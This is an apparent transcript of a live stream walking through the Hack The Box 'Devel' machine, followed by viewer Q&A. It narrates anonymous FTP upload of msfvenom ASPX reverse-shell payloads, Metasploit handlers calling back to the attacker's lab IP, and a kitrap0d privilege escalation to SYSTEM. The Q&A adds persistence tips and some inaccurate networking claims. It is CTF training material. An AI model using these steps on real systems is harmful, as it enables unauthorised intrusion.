So guys, we'll be starting live within a minute. Okay, so let me call all the guys out there. And today's agenda is that we'll be discussing about walkthrough regarding Devel. Okay, so please stay tuned. So guys, let's start. So in the meantime, let the guys join. Okay, so hello everyone. This is Satvik, and this video, as I told previously, we'll be discussing about the Hack the Box Devel walkthrough. So this is a simple machine, like a medium based machine. So this is available in Hack the Box, and this is a Windows based machine. So in the meantime, let me start my stuff. Okay, let me start my machine. Okay, and you can see my machine, right? Yes. Okay, so let me start the instance. Okay, let me start the retired machine. In the meantime, so we turn it on. You can't see that, guys, because it's on different screen. Okay, it's on different screen. So yeah, now I'll spawn the machine. Let's see, and let me get the IP address. Okay, it's taking a while because this is a Windows based machine, and we know how fast our Windows is, right? So let's wait for the in the meantime. Yeah, we got the machine active. Let me copy the IP address. Okay, so let me open my notes, and this is the previous notes only. Sorry. So this is the target IP, and let me turn on my VPN configuration file as well. Okay, so I'm in the hack the box directory, and let me connect to this. Okay, so let it connect. In the meantime, yeah, it's connected, and now let's get our IP address. Okay, our IP address is same, 10.10.14.24, so no need of anything else. And let me make a directory for this. Okay, so I created a directory so that I can store some files out there. And so let me do an nmap scan. Hi Sainath, hi, how are you? So let me do a simple nmap scan with the default scripts as well as the versions, and let me print the output to nmap scan.txt. And hi Sirpur, hi Akshay, and let me paste the IP address, and let's check what the things we'll be getting out there. So guys, if you are not having a membership, hack the box membership, you can simply look into it, and you can simply note it down so that it can be helpful in your future. Okay, you can simply note it down what I'm doing. Let me go to the full screen. Okay, so this we got the scan results, guys. Here you can see something like an FTP. Okay, and HTTP port is also open, and here you can see, yeah, only the two ports are open. So let me note it down. Ports open, uh, 21 and 80. Okay, so these are the ports that are open right now. So since our port 80 is open, so let's look into the brow let's look into the web page. Okay, let me open my Firefox and let's see what we'll be getting there. We got it. Okay, so yes, this is an IIS server. Okay, and we got some information. It is showing us welcome in different languages. Let's look into the page source and let's check what we'll be getting out there. So let me enlarge it for you guys. Here you can see something like HTML. There is nothing like important for us so we'll be leaving it behind. Okay, and there is, and guys, yesterday Gautam had asked me how we can use FTP anonymous login. So this machine is completely based on this. So what we'll be trying to do is we'll be trying to like attack the machine using this FTP. So let me open a new tab within my terminal, and since the FTP port is open and since the anonymous is open, so which means anonymous is nothing but means you don't need to provide a correct username. Okay, you don't need to provide correct username in order to access the files. Okay, whether it can be downloading or putting the files. And guys, here you can see in the scan, you can see the files, the files that are available in the FTP. So let's check whether these are getting hosted on the server or not. So yeah, this is the default page. Once again, let's check whether welcome.png. This is the image. Okay, this is the image. And also here there is something called ASP client. So let me copy this thing and let's check what it's hosting. It is forbidden. Okay, so we can conclude that the files that are on FTP server are getting hosted on the web server. So that's fine, right? So what I'll be doing is I will be logging into the FTP using anonymous. Okay, let me, yeah, as a go to FTP. So in order to connect to the FTP, simply do FTP and the IP address 10.10.10.5. I hope so. Yes, 5. So it is asking the username. We'll give anonymous, and the password, I don't know anything. I'll hit enter. So you can see that the user is logged in, and these are some simple commands. You can simply type dir so that it shows all the files, and also there is something like get and put. So get is nothing but downloading, put is nothing but uploading. So guys, if you want to attack a web server, you can simply and now let's create a payload. Okay, so now let's create a payload and then let's upload it to the server, and let's check whether we can exploit it or not. Okay, since we are having FTP, and let's check whether we can get it or not. So let me get this welcome.png and let's check whether we are getting it or not. Let me do ls. Yes, we got welcome.png. So right now we can download and put the command as well. So we'll also try to put nmap scan.txt and let's check what will happen. So put nmap scan.txt, and if I do dir, you can see that nmap scan.txt is available. Okay, Sorry for the delay, guys. I need to cough. Okay. So previously we had done how we can put the files and we can download the files. So we had downloaded a welcome.png file, and we also uploaded something called nmap.scan. So here we can see that we are able to upload our files. So what we'll be doing right there is, so we'll be trying to upload a php shell. Okay, a php shell, and then let's try to interact and let's try to connect to it. Okay, so guys, there is a good resource out there on internet, which is MSF Venom cheat sheet. I will provide you in the yeah, hi Sriram. I'll provide you in the chat. Okay, because this is one of the important thing. Okay, you can't remember all the stuff. So the one that I had provided in the chat box is the MSF Venom cheat sheet, because we can't remember all the payloads. Okay, so since this is a web server, we'll be trying to look into how we can create a php shell. Okay, a php shell, and then we'll be trying to uh, then we'll try to connect to it. Okay, and then we'll try to exploit. So that's the simple thing we'll be doing right now there. So, and guys, there is also something like .aspx as well. Okay, so first of all, let's create a php shell. So let's check where the payloads are. Yeah, you can see a payload here. So let me copy this line, or you can simply type it. That's not at all a big deal. MSF Venom minus p php slash meterpreter slash reverse tcp php slash meterpreter slash reverse tcp. Okay, and let me specify the l host 10.10.14.24, and let the L port be 4444. Okay, all fours, and let the format be raw, and let the output be something called shell.php. Okay, so let's try it out. If it doesn't work, we'll try the other payload. Okay, it will work definitely. Let's check what it will happen. Okay, so right now 5 members are watching. That's fine. I think more people will join up in time. Okay, so what I had, so to the all newcomers, okay, the one who joined lately. So here we got here we're attacking a machine called Devel, and here we found two ports open, which is port 80 and port FTP. Okay, so and FTP allows anonymous login. So I logged in anonymously using a username anonymous, and the password I haven't given anything. I simply hit enter, and then what happened was I got a shell, FTP shell, and then I had seen how I can download and how I can upload the files, okay, to the FTP server. So, and okay, so since we had uploaded nmapscan.txt, let's check whether it is coming or not. 5 slash nmapscan.txt. Yeah, you can see, yeah, by this you can conclude that you can upload the file successfully. So right now what I'm doing is I'm using this as a vulnerability, and I'm trying to upload a shell, okay, a shell to my web server. Okay, not mine, the attack the web server, and then we'll be connecting to it. Okay, so that's what I'm gonna do right now there. So we got a shell, guys, we got a shell. So what I'll be doing is I will be uploading it. So in order to upload it, you need to simply do put shell.php service not available. Okay, I don't know why. I think php is not at all available, so this can be a problem. Okay, port 421. Let me exit once again and let me try it whether I can upload the file or not. Let me try once again. Yes, it is successful. Okay, it is successful. So in the meantime, what I'll be doing is I'll be opening my metasploit, and then I will be opening a listener. Okay, so let me open my metasploit. So let's wait a while. Let's see what we'll be getting. So we got the shell, guys. So creating a listener is really simple. If you don't know, you can simply follow me. Okay, so first of all, use exploit slash multi slash handler and then set the payload. Okay, so it is php, so php slash meterpreter slash reverse tcp, and let me set my lhost as well, which is ton0. So ton0 is nothing but an interface that is provided to you if you connect it to a VPN. Okay, it is like ETH0, LAN0, WLAN1 or like that. Okay, so and let also set the L port. Set L port as 1 2 3 4. Okay, 4 4s. Let me look into the options, and we set it up everything fine. Okay, we set it up everything fine. If you are not familiar with what I'm doing, you can simply set the L host normally as well. 10.10.10.14.24. Okay, so if you look into the options, you can see. Okay, you can see, and let's exploit. So it will be listening to it. Okay, so now let's navigate to our file and shell.php. Okay, it is not at all responding. Okay, shell.php is not working. So let's wait and let's see whether it is uploaded or not. Okay, it's the connection terminated once again. Let me connect to it. So we got the shell.php. Let me reload it once again, but it is not at all responding. Okay, it is not at all responding. So guys, so there are many web payloads. Okay, it's not only the php, there is also something called aspx. Okay, so aspx, so let me show you what aspx means. So this is a .NET file. Okay, so since this is a Windows based machine, so Windows based server, so you can expect that this works right now. This works fine. Okay, so so this is also like a rabbit hole. We try to upload php, but it doesn't work. Okay, but it doesn't work. So I have my so now let's create a payload. Okay, now let's create a payload. Let me terminate the session. Now let's create a payload. Let me hit Ctrl Z once again here. So now let's freshly create a payload which is of ASPX format. So ASPX is nothing but a .NET file. Okay, so .NET is the one of the programming language that is used mostly in Windows. Okay, mostly in Windows. Okay, you can see .NET so a hell lot of times in Windows. Okay, if you are a Windows user. So now let's create a payload, a something called ASPX payload. So that's also a really simple thing, really simple. So what I'll be doing is msf venom minus p, which is Windows. This is a Windows payload, Windows slash meter slash reverse tcp, or you can go with shell underscore reverse tcp. We'll try shell. Okay, shell reverse tcp, and l host be 14.24 in my case, equal to 4 4. I'm going with this thing, and let the format be aspx, and let the output be exploit.aspx. Let's wait until when it creates a payload, and then let's upload. Hi Rohit, hi. Let's upload it via FTP, and let's see whether we are able to upload it or not, and we are able to exploit it or not. So let me open my listener as well using netcat. If you don't know netcat, you can watch my previous video where I had covered how you can do that. Okay, I think it's already in use. So we'll create, first of all, let's remove the payload. Okay, I'm doing a lot of complication. Okay, so now let's create a payload with all fives. Okay, with all fives. So let it get created. Okay. Yeah, now it is created. So let me open my FTP server once again. Let me upload it. Upload exploit.aspx. Copy this thing. Put aspx. Okay, so I had successfully uploaded it, and let me open my netcat server on all fives. Okay, let me go back to my file. Think we got the payload. Yes, we got the connection. So what I did was first of all, there is an FTP server, so I uploaded my shell there. Okay, I tried with something called PHP shell, but that doesn't work. And what I did was I created an ASPX. So ASPX files are nothing but .NET files. Okay, so you can check it out what it means. Okay, for further, and then I uploaded successfully via FTP, and then I connected to it via browser, and then I got the connection. So let me go with who am I, or something called who am I. Think, sorry, my bad. So I think we are not a user at, okay, we are not a privileged user. Okay, so what we'll be doing right now is let's get the user file. Okay, let's get the user flag. Okay, cd users. Once again there, and here there are two users, Babis and administrator. So let's go with Babis. Access is denied. So we haven't got a shell yet. Okay, we got shell, but that's not at all useful for us. So what we'll be doing right now is let's try to escalate our privileges on Windows machine. So in order to escalate our privileges on Windows machine, so what I will be doing is, so there is a tool called Windows Exploit Suggester. So you can simply get it. Don't close this, guys. Okay, so this keeps on running, we get the shell. Okay, Windows Exploit Suggester. I'll provide you the link. Okay, don't worry. So here you go, you got it in chat. Okay, you got it in chat, guys. Okay, you can try it out. So the installation is really simple. Do clone it using git clone and this thing, and then what you need to do is you need to install something called xlrd. So you need to do pip install xlrd. Okay, you need to have python 2 for it. Okay, and then you also need to update it. So after downloading all these things, I will show you. I had already downloaded them. So first of all, the main requirement, so let me close this thing, let me close my FTP, let me close my scan. These are not at all useful for me. Okay, so first of all, what I'm going to do is let me open a new terminal, let me go back, let me look into something called privilege escalation, and there's something called yes, here you can see I had already downloaded, guys. So this is my file, my folder over there. Okay, Windows. So this is a bigger, longer. Okay, but here after downloading it, you'll be getting something like this. So during the initial state, you need to update it. So what you need to do is / Windows Exploit Register. You don't need to type everything, just tap, it auto completes for you, and then do tap update, and then it will be writing all the data to an Excel file. So now let's come back to our shell. Okay, and then let's we also, for running this tool, we need to have something called a system information. So in order to get system information in Windows, you can simply type system info. Okay, so we'll be getting all the data. So copy these things, copy all of this, not all, but yeah, till this. Sorry, I think I did a mistake. Let me copy it once again. Yeah, now I copied it, guys. So I'll come back to this this place, this location, and then I'll be creating a new file. Okay, systeminfo.txt. There I'll paste the stuff, I'll save it, and I'm gonna close it. Okay, so what I did was I got all the system information, I copied it and I pasted it in a file. Okay, so if I do a now ls, we'll be having two new files, which is systeminfo.txt, which we created, and also an excel file. Okay, and also an excel file which consists of all the data. So you can, if you want to try it, just transfer it to your Windows machine and see what it contains of. So it's high time. Let's run our application /windows exploit suggester and tap data database, and the database is nothing but the excel file. You don't need to type it, just to and tab, it's completed. Okay, and then we also need to provide system info, tap system info, and the file is systeminfo.txt. Let me hit enter. So it will show you all the possible exploits out there. So here you can see something important things. Okay, you can see something important, lineage privilege escalation. These are not at all useful right now. Metasploit modules are also available. So ms07. So what we'll try to do right now is we haven't got any good results. Okay, so what we'll be using is, let's check whether we have ms0105. Yes, so this is something called kitraport. Okay, kitraport, this is also one of the most known vulnerability. So if you had seen something like ms10015, it is nothing but kitraport. So there is something called a module in Metasploit. Okay, a module in Metasploit. So let's once go to our machine and let's check kitraport, and let's check whether we can have something. Okay, or then we'll convert our shell to vdmload. Okay, this is not useful, I hope so. Windows exploit suggester. Okay, so what we'll be doing is we'll be transferring our shell. Okay, we'll be transferring our shell to a Metasploit. Okay, so let's go back to our machine. We ran this Windows exploit suggester, but we haven't got anything else. But the only important thing we got here, we are able to know, is ms10015. Let me copy this thing. This is nothing but kitraport. You can simply search for it. One of the most known vulnerability. Okay. Okay, so what I'll be doing is I'll be open a MSF console, and then let's see, let's transfer our shell over there. So let me exit this shell. Okay, let me exit this connection, and let me connect to it. Use exploit slash multi slash handler. Let's set the payload windows slash shells underscore reverse TCP. Also set the L host. I haven't solved this machine yet, guys, so this is my first time. So so this is like a live. Okay, this is, I'm doing it live. Okay, and also set the L port P all fives. Let me look into the options, and let's exploit. So let's reload this page once again. We get the shell. Okay, we got the shell. So we'll background this session, and then we'll do some important stuff. Okay, yeah, I'm background in this session, guys. So, and guys, there is something called a suggester, which is a Windows exploit suggester within Metasploit as well. So we'll use it. use suggester. Okay, and let me set the session. So let me look into the sessions. We have a shell session out there. Okay, so let me interact with this session. Sessions minus I, and sorry, not interaction, sorry. Let me look into the options of this payload. Explore, sorry, module. Let me set the session as 1, and let me exploit this thing, and let's check what are all the things out there. We'll get definitely something called Kitrapot. So this is the most known vulnerability, a kernel based one. This is a kernel attack. Okay, this is like a kernel attack. Previously in this in Windows exploit suggester we got it. So let's check whether we'll be getting it or not. Let's wait. In the meantime, you can post your questions. Okay, or else we'll directly go with Kitrapod. Okay, if it is not showing anything. Okay, so let me search for something called Kitrapod. Yes, we have one. Let me set the session. Let me exploit, and let's check whether we'll be getting it or not. Session is already elevated. Let me sessions. Think I'm wasting time. Okay. So we are not getting shell yet. So what I'll be doing is I'll be getting something called meterpreter. Okay, so this shell is not working. So let me I'm doing lots of waste things, guys. Okay, so let's create a payload which is of Metasploit. This is my first time, I haven't solved it yet. Meterpreter slash reverse TCP, and let me name it as exploit1.aspx. Okay, so let me come back. So let me open listener in the meantime. Let me set payload as Windows meterpreter slash reverse TCP. Okay, let me set lhost as 10.10.10 of 14.24. Let me set lport as 2345. Okay, and let's see whether we got it. Yes, so let me put it in the file. Okay, let me put it over there, 10.10.10.5. so anonymous. Okay, so put on dot aspx. So let me look for exploit, and let me go to the browser, and let me convert it as exploit1.aspx, and we'll get the shell. We got the shell. Okay, so I had done it really faster. Okay, since I got how to do it. So let me background this session with pg command. Let me use suggester. Okay, let me look into the sessions. We got session 2. Okay, let me set session as 2, and let me exploit it. Hey, do I need VIP to? Yes, you need to have VIP, dude. You definitely need to have VIP. And guys, it's almost completed. You can post your questions in your chat, okay, in the chat box. Okay, yeah, now it is working fine. I think there might be some problem with shell and something like Meterpreter. So it is always advantageous to have something called shell, sorry, Meterpreter. So since we also got a Caterpod here, let me use this thing. Okay, let me use this as my first opinion. Okay, so let me set session as 2 once again. Let me exploit it once again. Think it will be coming right now. Yes, it's completed. Sorry, yeah, there is something problem with the okay, so let me look into the options. This became a really worst process. Okay, we need to set lhost. I think them 10.10.14.24. Let me set the L port as 1235, and now let me exploit. Let's check it opens. Let's hope it opens. Okay, let's hope it opens. If not, this is worst. Okay, guys, in the meantime you can post your questions. Okay, I think the session is died. Sometimes it happens a lot. Let me set L port as and let me try to exploit it or run it. Okay, let's wait a while till it completes the thing. And there is something one of my friend had told me that there has been lots of session termination, like the session keeps on dying a lot because of this type of payloads. Okay, so let's wait and let's see what we'll be getting. And in the meantime you can post your questions, guys. Okay, you can post your questions. I think I'll be staying with more time only with you because still there is 30 minutes of time. Okay, you can post your questions. I'll definitely help you. So that's the end of the walkthrough. Sometimes it works, sometimes it doesn't works. Bro, what is meant by port forwarding? So port forwarding is nothing but uh, something like if you take man in the middle attack, so you will be the one who will be the mediator between the client and something called router. The port forwarding is nothing but you will forward the stuff to out there. Or there is something like if you try to create a payload using Windows, okay, and using Metasploit mostly. So what happens is you can only exploit or you can only listen to the connections if the target machine is in the same network. But if it is not in the same network, you need to use something called port forwarding. So you can use it. Okay, you can use it from something called router, or you can use it by using ngrock as well. I made a video on it. Okay, you can definitely look it. So as I told you previously, the session keeps on dying. So let me go back. Okay, so it became use exploit slash multi slash handler. Let me set the payload really faster. Okay, set payload, sorry, Windows slash interpreter. Reverse TCP. Let me set lhost as well. Let me set it. So I hope it's clear, Sriram. Okay, you can view some of my videos. Okay, I made something on port forwarding without router access. Okay, and let me set L port as all fives. Let me exploit and let's see what we'll be getting. Let me reload the payload. We got the shell once again. Once again we got the shell. So this time will be a little bit quicker because the shell dies. We already got the exploit sessions. We got session if you made a payload using Metasploit with ng tunnel, it will work on WAN. Yes, it works. Let me just a minute, guys. Let's exploit this thing. It became much more interesting. Okay. Let me set lhost as 10 tunnel 0. Let me set lport as 4455. Now let's exploit. Yes, I hope it will come. Yes, it's completed. So let me get the shell. So guys, this is a really tougher box, okay, because yes, we got authority system, so you can navigate to the directories or the location and you can submit your flag. So this is this is my first time, guys, first time solving this box, and this is really fun. And there is something problem the session keeps on dying. Okay, it died 2 times in the live session only, so make sure you are having a little bit of patience, because if you don't have patience you can't exploit it. So we successfully exploited, okay, the machine. In the meantime, you can ask your questions, guys. Okay, cd babis, I think there is a user called babis. Yes, we got an access. Sorry, user.txt.txt. Okay, cool. So let me do it. Yes, we got the pay, we got it. Sorry, cd space dot dot cd space dot dot. Let's go to the administrator and let's get the root flag as well. Okay, let me go to the desktop. Let me look into the stuff. Root.txt.txt. Let me copy this thing. So guys, this is like a complete live, okay, complete live. Okay, I haven't solved it. Okay, this is if you want these kind of videos, this can be really fun. Okay, but this can consume a little bit of time. Okay, we made payload using oh sorry, oh someone deleted the message. Okay, so guys, in the meantime you can post your questions. Okay, we had successfully exploited this machine and we got the shell access as well. So if you came a little bit late, okay, you can watch. Okay, you can watch it. Okay, so this will be available on my channel, and definitely look into it. So if you are having any doubts, I will be available for next 15 minutes. You can definitely post your wonderful questions. Okay, I'll definitely help you out. So let me terminate all these things. Okay, how to master Metasploit? So it is nothing, dude. Okay, it is really simple thing. Most of the times you need to know how to use it and how to uh, set the options. That's all. Okay, if on request, I'll definitely make a video. If you like it, please tell me in the comments. I'll make a video by today night on how to use Metasploit. Okay, so Shashank, whenever I type LAN 0 start or down, terminal shows that's no device found. So Shashank, I think you might be doing this thing on your Windows based machine. Okay, sorry, your VM machine. There will be no something like LAN 0 by default. Okay, I think you need to type ifconfig LAN 0 start or down. Once try it and update me in the forms. Okay, update me in Discord. If not, I'll help you. Okay, stop the machine as well. Let me stop all these things. You can post your questions in the meantime. Yeah, sure, you are welcome, Shashank. But if it doesn't work, I think you are in the Discord, right? If you are not in the Discord, I'll provide you the link. You share the link for CH book. I lost the link yesterday. Sure, definitely, dude. I think it's in I think Great Indian Sale is going on. You can get it for really a cheap price. Okay, I think it's only available for 2,800 rupees. I think now you bookmark it, Sriram. So we completed the spawning. Okay, so let's look into some of your wonderful questions. I can wait for you. Okay, today I'm really free. Okay, but thank you. You're sure you're welcome. So any more questions? I'm uh, really happy to answer. Discord link, please. Yeah, sure, sure, sure. Just a minute. So let me go with drive.google.com. I got it. Okay. I basically it, Shashank. Okay, you can join. And I think there is something like some applications by default. I think there is an application to Windows machine. Okay, I think for all machines, all operating systems, Discord is available. So make sure you have it because that's the only way I can communicate to you. Okay, I'm not having anything like Telegram or WhatsApp. Okay, so make sure you check it while. Okay, check it a while. Okay, so any more questions, guys? I'll be available for next 10 to 20 minutes. Okay. And you can help me with your suggestions. Okay, I think the audio quality is fine, right? So yes, okay, good. That's the only thing I invested. Okay, that's the only thing I invested on the channel, only the good mic. Okay, the two a cheaper one, not so costlier. So any more questions? I'm ready to answer. Okay, and guys, if you want to get me live tomorrow also, you can post. Okay, so this video might be a little bit became a little bit longer because I solved this machine for the time. Okay, for the first time. So yeah, that's how I do. That's how I attack a machine. Okay, that's how I attack machine. Linux or Pareto? Yes, that depends, dude. Okay, I'm used to Kali Linux because I like GNOME environment. I haven't used Pareto is much. Okay, but yes, how to maintain access after getting the access to the machine payload that is created with maintain access means I haven't understood. Okay, I think you might be asking something called persistence. So to be frank, Metasploit doesn't have good modules for persistence. Okay, if you close your machine, your connection is lost. Okay, so there is a good video on it. Okay, so if it's possible, I'll help you. Definitely provide how you can maintain persistence. VMware VirtualBox. Yeah, I like VMware. I like VMware. Okay. So there is a video from Jack Tutorials. Okay, I really liked his channel. So Sriram, I pasted a link. Okay, so you can see something how you can make a persistent backdoors using Metasploit and how you can connect to it. So if it doesn't work, you can let me know. But there is some problem. Okay, you can't always have it. VMware VirtualBox. So Akshay, so VMware is the paid one and VirtualBox is the free one. It depends. Okay, but when it comes to industry standard, it's like VMware, because you can OSCP is providing their own version of their Linux, Kali Linux, but uh, the the Linux that is provided will only work for VMware, so you can understand. Okay, and VMware also have a free version, which is VMware Workstation Player. Right now I'm using Pro. I got it as a gift. Okay, VMware Workstation 15. I got it as a gift. Okay, in one of the CTF. Okay, so that's it. And if it comes to Kali Linux or ParrotOS, I think Parrot is becoming much more gooder nowadays. Okay, but Kali Linux is losing its charm. I feel it. Okay, I feel like it. Okay. So any more questions? I'm really ready to help you. So what, bro? I'm using VirtualBox. How can I transfer files to the main machine and VirtualBox? So there is something called shared memory. Okay, but I'm not using VirtualBox right now much. But there is something called shared folders. You can create it, Sriram, and you can use that for sharing the files. You can simply search for it. Okay, there are some videos. Advice college because comes with preload. Yeah, even ParrotOS comes with hacking tools. Okay, but most of the time, because we guys are mostly used to GNOME desktop environment, so we'll feel like that. Okay, we'll feel like that. But it depends, dude. Okay, it depends. And if you're having a much more compatible, much more powerful CPU, you can definitely use something called Black Arc Linux. That's much more powerful. Okay, that comes with like some hundreds or thousands of tools. We can't use it in our lifetime. Okay, hacking distributions are nothing to do. You need to have only the skill. You can host a machine on uh, you can host a machine on cloud, or you can have something called Windows subsystem for Linux. Okay, but only thing you need to have the skill. Yeah, i7 is recommended. Okay, i7 is recommended, but if you are using something called Windows subsystem for Linux, even i5 is sufficient. Okay, even i5 or i3 is sufficient. So 5 more minutes or 5 to 10 minutes. If you are asking questions, I'll stay, or I'll end it in 5 more minutes. Okay. Okay. So any more questions? So what after CH? Uh, you can, like, there are many more courses, okay, many more certifications, but after CH, I'm going right now with something called OSCP. Okay, you can do that after as well. VirtualBox settings. I'm not having much in VirtualBox. Okay, I'm not using VirtualBox at all. I'm mostly using this thing only, VMware only. Just placed it in an icon, but I'm not at all using it. Okay, I'm not at all using it. I'm only using VMware. So I'll remove this icon as well. This is useless for me. The only thing I'm having is I'm having Hadoop over there. Okay, so your experience in hacking. So I'm really a newbie only, but I gained some experience by doing some practical stuff. Okay, I did an internship, and yeah, like that I got some experience. Okay, it's like it's been 2 years. Okay, it's been 2 years I have been in the field of hack, but I learned a lot. Okay, I learned really a lot. Like most of my friends don't even know what I'm doing. Also, they see like a Malayalam movie or a movie which is in different language when I'm doing this kind of things. But happy to see some people who are like-minded. Okay, who are watching this channel. Okay, so let's see some more good questions. Okay, or else if you're not having any questions, I will end it within 2 minutes. Think I'll come to tomorrow. I'll come live to tomorrow as well. Okay, tomorrow we'll only put a session, not on something like hack the box or thing. Just just discuss some stuff. Okay, think that can be much more convenient so that we can interact a little bit, right? Is that fine? Just show your interest in chat box. Yeah, sure, sure. Tomorrow we'll only make a live just for interaction. Okay, just for interaction sake. No, yeah, more my friends also think hacking is crime, but that's not at all a crime according to me. You can earn a lot by hacking, but if you are if you do it for good, you'll definitely receive the good things. Okay, so I'm a noob. How to learn Kali Linux and Metasploit from basic? So dude, Akshay, Kali Linux is really simple. Okay, the one thing you need to do is, okay, you need to get some grip over something called Linux, like operating system or stuff like that. So I'll provide you the. I think Akshay, are you? I think you are in something. You are in my group. You are in my Discord server, right? I'll provide you the something. I'll provide you resources regarding that. Okay, the free resources regarding operating system. So learn it. Okay, and then we'll see. I think if you know good amount of networking, if you have good knowledge on networking, then you can definitely succeed. Okay, the only thing I focus a lot is networking. And there is a good book as well which is available for let me provide you the book that I take as. Yeah, Sriram, I'll provide it in Discord server. Okay, it will come to all. Okay, don't worry, don't worry. There is a book called Data Communications and Networking by Forozan. I'll provide you the link. Okay, that's really cheaper book. That's only 600 rupees or 700 rupees. When you use webcam, you will get more likes. Sure, sure, sure. Yeah, I'm not having any separate camera for this. I just have my computer's webcam. That's not at all, like you all know, right? We all know how good our internal cameras are. Yeah, definitely, definitely do it. Okay, definitely do it. Thank you for your suggestion. So guys who are really interested in learning networking a lot, I provided you a book. Okay, that's a book. If you found some basic networking I am following, yeah, sure, then that's fine. Learn how to use Linux, and then you will definitely look into it. And I'll make, if on request, I will make a video on Metasploit. Okay, by today or tomorrow. So I'll show you how you can use Metasploit. Okay, so if you're really interested, please tell me in the chat box. Hi Gautam, I think you came late. Yeah, no, I think yesterday you asked me how you can exploit, how you can do some stuff out there. Yeah, it's completed. But yesterday you asked me how you can uh, try to log in with FTP anonymous login. So this video is everything regarding that. So you can go back and watch it. Okay, this will be available on my channel also. I'm not deleting lives. Okay, you can check it out. So yes, I will make video on Metasploit. Okay, by tomorrow or yeah, by the end of Sunday or by the end of Monday. Yeah, sure. So why I can't use Metasploitable in public network? Because the way the payloads are designed, by the way the payloads are designed, try hack me, I'll look into it. Okay, I'm not at all familiar with that platform. I'll definitely look into it, Gautam. Okay, so let me come to Shashank question. So Metasploitable in public network, yeah, you can use it, and make sure and get ready that your machine is gonna get attacked. Okay, and able to access the chat option for the links you provide. Yes, you can't. Okay, you can't. So you note it. Okay, only the comment section is available. The live chat is getting disabled. Okay, I don't know the reason why, but so that's the reason I'm requesting all you guys to join Discord. Okay, so there we can, if you ask me, I can definitely tell you over there also. Hi, hi from India. So as requested, tomorrow I'll only come to live just for solving your questions. Okay, by 10 a.m. Okay, post some of your questions, and if you want to get some problem solved, or if you are having something like any questions or any links that I posted here, you can definitely ask me in my Discord. Okay, so I'll be there almost all the time, almost all the time, and you can seek help from me there as well. So that's the reason why I created this group. So I previously created, yeah, sure, pentesting box. I had seen it. It's nothing but Metasploitable, Gautam. But I think you know how to exploit Metasploitable, right? I had seen that video by John Hammond, previously, like when I was noob. That's everything regarding something called Metasploitable. Yeah, I'll definitely do that, Gautam. Okay, but I'll not go with live. I will make a video and I'll post the walkthrough. Yeah. Okay. And I had seen most of the guys had simply joined the Discord server. Like there are nearly 50 members, but only two or three response. Okay. Yeah, I know you are not at all free, but and I also know that you guys are not having application. Okay. 100 bucks for medium level pen testers, Devel and Optimum in Hack the Box. Okay. This machine is a little bit tougher. Okay. This is a little bit tougher. You can try it out. Okay, you can see how tough this box is, how tough it gets on. The exploiting is simple, but the session keeps on dying. Okay, you need to have a patience for that. When you are online at Discord, I'm online all the time. Okay, my the application keeps on running. I can show you. The application keeps on running. I checks it for 10 times. Okay, like for every 10 minutes I'll check the Discord, so you can post your questions in the channels. Okay, there are some channels. Okay, the related channels, uh, you can post your questions in the related channels. Okay, I'll try this box without seeing. If get any issues, I will see the video. Sure, sure. As you told that you don't know how to use FTP Anonymous, you should watch it. Okay, without knowing how FTP works or how you can do the stuff, it can be tough for you. So any more questions? I will stay for next 10 minutes if you are posting some good questions, or else we'll pack up. 2 more minutes. Any questions? Make sure that if you are having any doubts, please contact me via my Discord. Okay, so there we can, there me or some of my mentors can help you. Okay, tell how to use Discord. So let me open my Discord. So this is Discord, dude. So I think you had joined my Discord. So these are some related channels, and so what happens is like you can post your questions in the related channels. Suppose if you want, if you came new, you can. I'm not a pro, but I'm telling how you can use it. These are called something called channels. Okay, so here, who am I? You can introduce yourself. You can post some general questions. Okay, we can discuss the stuff out there, and you can post your questions in these related channels. You can simply hit on it, and you can uh, post your questions. Okay, related to coding, or you can simply hang out. Okay, you can chill out there. Yeah, this is simple. Okay, this is not at all a rocket science. Okay, which class are you? I'm a BTech third year student. Okay, I'm in seventh class. Are you seventh class student? Cool, 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 cool. Okay, so what difference between hack me and hack the box is paid, one hub is free. That's all. And setting up hack the box is really simple. You can simply connect to the VPN file. But for hub, you need to download the vulnerable VM. You need to set it up, and then you need to exploit. Okay, so that's the difference. That's the difference. That's the only difference. I find hub is something no, not at all fishy. So even OSCP is taking use of them. Okay, that's not at all fishy. But the only thing is the setting up is can be really difficult. You need to download it. You need to set it. Okay. May I know the Steam? I'm computer science engineering. So bro, what is difference between proxies and VPN? So the difference is the VPN has only one server which is hosted on somewhere. Okay, but the proxies can be many servers. Okay, something like yeah, I'll definitely make a video on that. Okay, so in VPN we connect to one server, okay, but in proxies we connect to many servers. So the level of encryption gets much more stronger in proxies, and also the anonymity is also more in proxies. So I posted a video in chat, so which tells you how you can use Discord effectively. Okay, so try to use it. Okay, that's not at all a rocket science. If you use it for a while, you definitely get it how you can use it as well. Okay, so I will end up in next 3 minutes. Okay, so I'm having a little bit of work. So BSc computer science engineer, cool Akshay. I'm from Andhra Pradesh. Yes, it's completed. Yeah, love you 30,000. 2 more minutes, we'll end up the session. Okay, post your questions as soon as possible. Okay, as soon as possible. Show your profile in Hack the Box. Okay. Uh, I started it recently, but no, that can't be a little bit or and I stopped my membership. Okay, I mostly do the retired machines. Okay, so it my rank is noob over there. Okay, that's fine. Go to the dashboard and yeah, my rank is 799. That's fine for me because I started it recently, and yeah, I'm progressing towards OSCP. Bro, make a video on how to use Hack the Box for beginners. That's simple, Jude. First of all, you go to your Hack the Box. Here there is something called let's go to the dashboard. This is the newest UI. Okay, getting start. If you go to the getting started, you go to something called internet access, and you need to download something called OpenVPN file, and then you need to connect to it. Okay, the connection is really simple. OpenVPN and the OVPN file. That's all. That's really simple. And there is something called there are two UIs. Okay, this UI is much more known. Use of HackTheBox is you can practice your hacking skills legally. Okay, if you go to access, you'll get a VPN file, download it and connect to it. If you don't buy the membership, I won't be able to start machine. You can start machine in HackTheBox, but those are not retired machines. Okay, and there are some added advantages. Okay, if you are on normal subscription, if you're a normal subscription, sometimes like many users will be on the same machine, so the machine gets little bit slower. But if you are VIP, you will be given a separate usage. Okay, you'll have some more privileges. Okay, so that's the only difference, but that's not at all costlier. I'm closing it. How much it costs for Hack the Box VIP? $10. Can we be friends, hacker friends? Yeah, sure, definitely. Definitely, Shashank. And if you are on Twitter, okay, if you are on Twitter, you can follow me on Twitter as well. It is nullshock1. I'll post the link in the link as well. Sometimes you can find me here as well, okay. You can definitely look into here as well, okay. I post some important information here as well, okay. Have you ever done DDoS attack? No, not yet. I did a DDoS attack. 30 days. 30 days, 10 pounds, I hope so. It's 1000 rupees approximately. Your inspiration and your favorite IPL team. My inspiration is my parents, okay. I like my parents. My parents work really hard. My favorite IPL team is CSK, Chennai Super Kings, okay. But that's off topic, 